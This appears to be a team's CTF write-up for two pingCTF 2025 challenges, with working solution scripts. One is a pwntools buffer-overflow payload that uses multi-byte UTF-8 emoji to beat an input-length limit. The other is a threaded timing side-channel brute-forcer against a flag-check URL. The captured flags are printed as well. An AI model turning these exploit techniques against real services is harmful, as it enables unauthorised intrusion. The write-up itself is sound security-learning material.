team-logo
Published on

pingCTF 2025 - PWN challenges

Authors

Introduction

We solved all 2 of 4 tasks. More info about this CTF is here

pwn

Table of contents

baby pwn

baby pwn It was a straightforward buffer overflow exploit (pwn). The goal was to overflow the buffer by replacing "1234" with the word "ping" However, the challenge was how to overflow the buffer when there was a limit on the number of characters that could be input. Fortunately, it was possible to send UTF-8 characters, which are counted as a single character but can occupy up to 4 bytes. After calculating the correct input, the buffer overflow was successfully executed.
from pwn import *             

context.update(arch='x86_64', os='linux') 
context.terminal = ['wt.exe','wsl.exe'] #d

HOST="nc 188.245.212.74 32100"
ADDRESS,PORT=HOST.split()[1:]

BINARY_NAME="./main_no_flag"
binary = context.binary = ELF(BINARY_NAME, checksec=False)

if args.REMOTE:
    p = remote(ADDRESS,PORT)    
else:
    p = process(binary.path)    

payload=18*'😀'+'abcping'


p.sendlineafter(b"Enter your name:", payload)


p.interactive()

ping{b3g1nn3r_fr13nd1y_bu773r_0v3rfl0w}

tick-tock

alt text

This task was a bit more challenging, though not extremely difficult—just very time-consuming. Fortunately, the organizers took pity on us and limited the range of characters to scan. The goal of the task was to guess the flag from the website.

http://88.198.164.1:20420/check?flag=ping{}

We were also provided with the response time of each attempt.

Incorrect!
Time taken: 118120ms

Sounds simple, right? It might seem so, but sometimes we had to brute-force two letters, and it was absolutely necessary to use threading because otherwise, it would have taken forever. The delays between queries were a few seconds long, likely by design, so checking the entire alphabet would have taken ages. Additionally, the response time increased when more correct letters were guessed, and the script relied on this behavior to identify the correct characters. Thankfully, a script with threading managed to solve it in a few hours.I tested the script on the same length as the flag, which was 60 characters.

Solution

import requests
import string
import itertools
from concurrent.futures import ThreadPoolExecutor, as_completed

# Ustawienie początkowej flagi
INITIAL_FLAG = "ping{"
URL = "http://91.107.202.115:20420/check?flag="
#POSSIBLE_CHARS = string.ascii_lowercase + string.digits + "_"
POSSIBLE_CHARS = "1}3457unsdchr_" #hint


def test_flag_request(test_flag):
    """Funkcja testująca flagę i zwracająca czas odpowiedzi."""
    try:
        response = requests.get(URL + test_flag, timeout=50)  # Dodano timeout dla bezpieczeństwa
        if response.status_code == 200:
            time_taken = int(response.text.split("Time taken: ")[1].split("ms")[0])
            return test_flag, time_taken
        else:
            return test_flag, None  # Jeśli status code nie jest 200, ignorujemy wynik
    except Exception as e:
        print(f"Błąd podczas testowania flagi {test_flag}: {e}")
        return test_flag, None

def check_flag():
    flag = INITIAL_FLAG + "}" * (60 - len(INITIAL_FLAG))  # Początkowa flaga z możliwością zmiany

    for i in range(len(INITIAL_FLAG), 60):  # Sprawdzamy kolejne pozycje
        base_time = None
        found = False

        # Najpierw testujemy pojedyncze znaki
        with ThreadPoolExecutor(max_workers=10) as executor:
            futures = {
                executor.submit(test_flag_request, flag[:i] + char + flag[i+1:]): char
                for char in POSSIBLE_CHARS
            }

            for future in as_completed(futures):
                current_flag, time_taken = future.result()
                if time_taken is None:
                    continue  # Ignorujemy nieudane zapytania

                print(f"Testuję: {current_flag} -> Czas: {time_taken}ms")

                if base_time is None:
                    base_time = time_taken
                elif time_taken > base_time:
                    flag = flag[:i] + futures[future] + flag[i+1:]
                    print(f"Znaleziono lepszy znak: {futures[future]} na pozycji {i}, przechodzimy dalej.")
                    found = True
                    break

        # Jeśli nie znaleziono lepszego znaku, testujemy pary znaków
        if not found:
            with ThreadPoolExecutor(max_workers=5) as executor:
                futures = {
                    executor.submit(test_flag_request, flag[:i] + char1 + char2 + flag[i+2:]): (char1, char2)
                    for char1, char2 in itertools.product(POSSIBLE_CHARS, repeat=2)
                }

                for future in as_completed(futures):
                    current_flag, time_taken = future.result()
                    if time_taken is None:
                        continue  # Ignorujemy nieudane zapytania

                    print(f"Testuję: {current_flag} -> Czas: {time_taken}ms")

                    if time_taken > base_time:
                        char1, char2 = futures[future]
                        flag = flag[:i] + char1 + char2 + flag[i+2:]
                        print(f"Znaleziono lepszą parę znaków: {char1}{char2} na pozycji {i}, przechodzimy dalej.")
                        found = True
                        break

        if not found:
            print(f"Nie znaleziono lepszego znaku ani pary znaków na pozycji {i}, przechodzimy dalej.")

    print(f"Ostateczna flaga: {flag}")

if __name__ == "__main__":
    check_flag()

ping{s1d3_ch4nn315_4r3_7un}